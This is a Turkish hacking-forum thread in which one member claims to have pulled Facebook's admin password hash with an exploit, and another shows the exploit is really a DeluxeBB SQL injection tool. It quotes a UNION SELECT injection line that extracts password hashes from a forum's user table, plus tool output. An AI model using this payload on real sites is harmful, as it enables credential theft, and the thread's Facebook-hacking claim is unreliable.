Facebook admin hash // The Wolf

The Wolf

Katılımcı Üye
13 Eki 2008
722
2
Åtlantís
Arkadaşlar çok zor bir şey değildi bazıları beni küçük görüyorlar kendileri Hacker zannediyorlar ibret alsınlar diye koyuyorum :) Bana kaşı bir saygısızlık asla unutulmaz ben unutsam başkaları alırlar bunu unutmasınlar bizim karşımıza rakipleer çıktı diyorlar ordan burdan forumlardan öğrendikleri bilgilerle bize kafa tutuyorlar.:) Anca güler geçerim adamlar ne yapsın 2-3 üye açık oluyor sitelerinde ancak oda nadir kapatılcaklarda işte adamlar kendiler lamer türk sitelerine misyon gereği bir şey yapmıyoruz şunuda unutmayalım hiç bir şeyi abartmayın.

Sorun şurda adamlar bizlerden öğrenip gidip bi uyduruktan bi tim açığyo iki ddos çekiyo onu bi marifet sanıp bütün siterlde yayınlıyor adamların kendi sunucuları bile yok düşünün :) hallerini adamlar kimin host ettiği belili olmayan uyduruktan bir host firmasımı belli değğli alıyoo paraya yazık.

Çok konuşmayım aşağıla link var

Link: Upload.gen.tr

Saygılarıma The Wolf

The Wolf

Katılımcı Üye
13 Eki 2008
722
2
Åtlantís
ADmin hashını alıp kıarasın siteyi Hacklersin Md5 diyebiliriz ama bu daha başka bir şey ;) açıklayıcı olmuştur.

¿__Ms-DoS__?

Katılımcı Üye
19 Mar 2009
290
0
30
Trabzon
ADmin hashını alıp kıarasın siteyi Hacklersin Md5 diyebiliriz ama bu daha başka bir şey ;) açıklayıcı olmuştur.

HeLaL TheWoLF basmışın exploiti :D varya o kadar koLay buLunan exploit te nasıL oluorda faceboo ka da yiyor ayn ıexploiti bu sitede görmüştüm bi hafta önce senin gibi baktım exp.pl yazıyo aynı exploit oLduğunu anLadım bastım seninki gibi md5 verdi milw0rm dan kırdırmaya caLıstım çıkmıyo :D

senin explotitinin aynısı EDİT : SİTE VERMEK YASAKTI UNUTTUM :D a da yiyor md5 veriyo passaword has is: .......... bişi Ler diye gidiyo :D

Son düzenleme:

¿__Ms-DoS__?

Katılımcı Üye
19 Mar 2009
290
0
30
Trabzon
---------------------------------------------------------
----------------
[>] SERVER: Welcome to Facebook | Facebook
[>] DIR: /1
[>] USERID:
----------------

[~] PREPARE TO CONNECT...
[+] CONNECTED
[~] SENDING QUERY...
[+] DONE!

--[ REPORT ]---------------------------------------------
----------------
Password Hash is: f485382ffec1eef7ca265c6b55dc89cf
------

C:\Perl\bin>

SürekLi hash deişiyor :D

The Wolf

Katılımcı Üye
13 Eki 2008
722
2
Åtlantís
Videomu düzgün izlediysen oda Facebook güvenlik önlemerinden birisi bu nedenle zor hacklersin Facebook.

anlaşılmayacak bir şeyde yok üstelik admin hash alındı facebook zaten hash ne olduğunu bilmiyorsan forumda biraz gezsen iyi olur.

Bunlar sadece biraz ugraşmaka bağlı.

Şimdi birsi çıkar bana bir şeyler öğretmeye kalkışır bölye bir şey istemiyorum ben zaten öğrenme yolunda ilerliyorum.

carexumar

Yeni üye
25 Haz 2008
36
0
Şimdi birsi çıkar bana bir şeyler öğretmeye kalkışır bölye bir şey istemiyorum ben zaten öğrenme yolunda ilerliyorum.

Gel bu yolda sana yardımcı olayımda bazı şeyleri yanlış anlatıp buradaki çoluk cocugu kandırma. (Bana kızma zaten yöneticisin istersen sildirisin bu mesajı öğren diye yazıyorum)

Eh be kardeşim madem perl bilmiyorsun o zaman niye sade atıp tutorsun.
Videomu düzgün izlediysen oda Facebook güvenlik önlemerinden birisi bu nedenle zor hacklersin Facebook.
demişssin. İnsan açar bir bakar bunun içinde ne yazıyo ne yazmıyor diye hiç birşey bilmiyorsan bile
Kod:
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
diye bir satır var insan düşünür facebook ta misc.php diye bir sayfa mı var diye onu geçtim deluxebb_users diye tablodan veri çekiyor, bunlar bu kadar tesadüf olur diye hiç mi düşünmezsin?

Sonuç olarak madem bilmiyorsun adam gibi öğrenene kadar böyle atıp tutmayacaksın. Bak adamlar yazmışlar
print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
######################################################
};
En azından buradaki yazıya güven be kardeşim.

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.